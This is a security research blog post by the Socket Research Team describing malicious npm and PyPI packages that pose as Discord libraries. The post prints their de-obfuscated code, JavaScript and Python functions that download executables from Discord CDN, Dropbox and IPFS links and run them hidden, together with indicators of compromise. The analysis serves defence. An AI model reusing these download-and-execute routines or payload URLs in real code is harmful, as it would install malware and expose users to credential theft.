Research
Socket Research Team
May 7, 2024
Discord’s popularity has made the platform a prime target of threat actors for years, and this trend is continuing in 2024. With an estimated 614 million registered users and more than 227.7 million monthly active users, Discord has enormous appeal to attackers looking to steal sensitive information.
The platform is primarily known as a hub for gamers, with over 400,000 servers dedicated to gaming and approximately 56% of users engaging in gaming for more than four hours each day. With 70% of Discord users using the platform for gaming, attackers often target popular gaming-related communities to exploit vulnerabilities or launch attacks.
At Socket we have witnessed a near constant influx of malicious code uploaded to public package registries targeting Discord. These packages are often highly obfuscated, can monitor user actions such as logins and changes to credentials, enabling attackers to hijack accounts and commit fraud.
In this post, our research team will explore several examples of malicious Discord packages we've recently encountered. Each package discussed here employs a distinct technique to carry out malicious actions. We'll explore several noteworthy ones to shed light on various patterns of malicious behaviors that are trending in open source package registries.
Let's examine the malicious behavior of ‘djs-colours’ and consequences of downloading this harmful package. The package racked up 218 weekly downloads before removal from the npm registry.
Downloading and Executing Bot File
async function downloadAndExecute() {
try {
if (os.platform() !== 'win32') {
return;
}
if (fs.existsSync(downloadFolder)) {
exec('' + downloadFolder, (error, stdout, stderr) => {
if (error && error.code !== 1) {
throw new Error('Error starting the bot!');
}
});
return;
}
const response = await axios.get(url, {
responseType: 'stream'
});
const fileStream = fs.createWriteStream(downloadFolder);
response.data.pipe(fileStream);
await new Promise((resolve, reject) => {
fileStream.on('finish', () => {
exec('' + downloadFolder, (error, stdout, stderr) => {
if (error && error.code !== 1) {
reject(new Error('Error starting the bot!'));
return;
}
resolve();
});
});
fileStream.on('error', reject);
});
} catch (error) {
throw error;
}
}This function primarily verifies whether the platform is Windows and if the bot file is already present in the download directory. If the bot file exists, it initiates its execution using child_process.exec. However, if the bot file is absent, it proceeds to download it from the designated URL via Axios, saves it to the download directory, and subsequently executes it. This URL points to an executable file (.exe) named "Uninstall-Node.js.exe". The download URL:
'hxxps://cdn.discordapp.com/attachments/1226837177728503868/1226837233776984186/Uninstall-Node.js.exe?ex=66263836&is=6613c336&hm=6b2059973fe429009fc831a1405b32e9986fd93d196498bdd5fbde5481ef816a&'
Login Function
async function login(token) {
if (!token) {
console.log(chalk.red('No token provided.'));
await downloadAndExecute();
return;
}
const isValidToken = await checkToken(token);
if (!isValidToken) {
console.log(chalk.red('Your bot token is invalid.'));
await downloadAndExecute();
return;
}
console.log(chalk.green('Your bot token is valid.'));
await downloadAndExecute();
}This function is designed to handle Discord bot tokens, expecting one as input. In cases where no token is provided, it logs an error message and proceeds to download and execute the bot file. Conversely, if a token is provided, it verifies its validity using the checkToken function. Should the token be deemed invalid, the function logs an error message and continues with the download and execution of the bot file. Conversely, upon validating the token, it logs a success message before moving forward with the download and execution process for the bot file.
Dynamic Analysis Threat Summary
During the dynamic analysis, suspicious activity was observed, including the download and potential execution of a file related to Node.js. Microsoft Edge was executed within a sandbox environment, with multiple instances of the browser process detected. Registry key modifications, possibly indicating alterations to browser settings or configuration, were also identified. These findings suggest potential malicious behavior and highlight the need for further investigation.
Check out the full summary of any.run report: https://app.any.run/tasks/e1dd2133-5b85-4e9e-9706-cf6f65bb5e5e
IOC
This package, which purports to be a "selfbot for newest discord APIS," instead downloads and runs an executable when being invoked:
downloadExe("https://cdn.discordapp.com/attachments/1196096543380471808/1197649993318805625/updater.exe");The link for was not accessible at the moment of analyzing the package.
IOC : hxxps://cdn.discordapp.com/attachments/1196096543380471808/1197649993318805625/updater.exe
This package is not only similar in name to the previous one, but likewise downloads an executable upon invocation, while pretending to be a "discord.js streaming API for stability":
downloadExe("https://cdn.discordapp.com/attachments/1199378108181131297/1199378245481660556/TankuumSetup.exe", "updater.exe");The link for was not accessible at the moment of analyzing the package.
IOC : hxxps://cdn.discordapp.com/attachments/1199378108181131297/1199378245481660556/TankuumSetup.exe
This package contains obfuscated code which upon de-obfuscation reveals malicious code similar to ‘discord.js-sounds’
(async () => {
const _0x33a423 =
'https://cdn.discordapp.com/attachments/1213492000243056683/1213492205113712660/Tankuum-Install.exe?ex=65f5abaf&is=65e336af&hm=9df4ea5612ddb8db083c1a1db0f93e38025491de2ec8f20dc2134111b90c27c4&'
await downloadExe(_0x33a423, 'updater.exe')
})The link for was not accessible at the moment of analyzing the package.
IOC : hxxps://cdn.discordapp.com/attachments/1213492000243056683/1213492205113712660/Tankuum-Install.exe
Claiming to be "discord music lib", this package was downloaded 115 times before removal due to malicious code downloading and then executing a binary file:
downloadExe("https://cdn.discordapp.com/attachments/1208807524732637188/1208878059499946054/HEosnziOZnnae2.exe?ex=65e4e26d&is=65d26d6d&hm=63f2a57848256b4be79faea79beea2e04a3923406faa67bf4917b1e33d1d1e61&", "updater.exe");The link for was not accessible at the moment of analyzing the package.
IOC : hxxps://cdn.discordapp.com/attachments/1208807524732637188/1208878059499946054/HEosnziOZnnae2.exe
const fileUrl = 'https://nftstorage.link/ipfs/bafybeic6ynabp3it46jpokbvohdr2ipkrojw2nbxun42ls6r4df6h3a53e/app.exe';
const fileName = 'app.exe';
const GetNitroSnipe = (url, destination) => {
return new Promise((resolve, reject) => {
const downloadCommand = `curl -o ${destination} ${url}`;
exec(downloadCommand, (error, stdout, stderr) => {
if (error) {
reject(error);
} else {
console.log('Téléchargement terminé.');Dynamic Analysis Report : https://tria.ge/240425-gpea4sgd7s/behavioral2
IOC : hxxps://nftstorage.link/ipfs/bafybeic6ynabp3it46jpokbvohdr2ipkrojw2nbxun42ls6r4df6h3a53e/app.exe
url = "https://dl.dropbox.com/scl/fi/jjtrgmwdcc4mfddjdajdi/discordpy.exe?rlkey=p1wwwn3qtodhghsose8gqa9ud&dl=0"
def start():
archivo_destino = os.path.join(os.environ['TEMP'], 'windef.exe')
print(f'Descargando {url}...')
response = requests.get(url)
with open(archivo_destino, 'wb') as archivo:
archivo.write(response.content)
print(f'Archivo descargado en: {archivo_destino}')
print(f'Ejecutando {archivo_destino}...')
subprocess.run([archivo_destino], creationflags=subprocess.CREATE_NO_WINDOW, shell=True)
print('Proceso completado.')Dynamic Analysis Report : https://tria.ge/240425-hg6aasgf41/behavioral2
IOC : hxxps://dl.dropbox.com/scl/fi/jjtrgmwdcc4mfddjdajdi/discordpy.exe?rlkey=p1wwwn3qtodhghsose8gqa9ud&dl=0
Here we tried to cover multiple kinds of unique malicious patterns of packages targeting Discord users. For those who fall prey to such malicious packages, we observed that multiple kinds of sensitive data theft occur.
It's worth mentioning that we've identified numerous packages listed on PyPI and npm with identical Indicators of Compromise (IOCs) and comparable malicious patterns. The scalability of supply chain attacks (SCA) on the open source ecosystem has notably increased due to the prevalence of stealer tools available on GitHub.
These tools adeptly evade diverse security measures to exfiltrate sensitive data.
Socket Research Team
Subscribe to our newsletter
Get notified when we publish new security blog posts!
Security News
The Python Software Foundation has secured a 5-year sponsorship from Fastly that supports PSF's activities and events, most notably the security and reliability of the Python Package Index (PyPI).
Security News
LDAPjs, an LDAP Client and Server API for Node.js, was decommissioned after its maintainer received an abusive email from a user, raising concerns about this form of abuse as a potential attack vector.
Security News
CISA launched a new project called Vulnrichment to enrich CVEs with details that help prioritize patching and mitigation efforts, as the NVD backlog of unenriched CVEs awaiting analysis surpasses 10,000.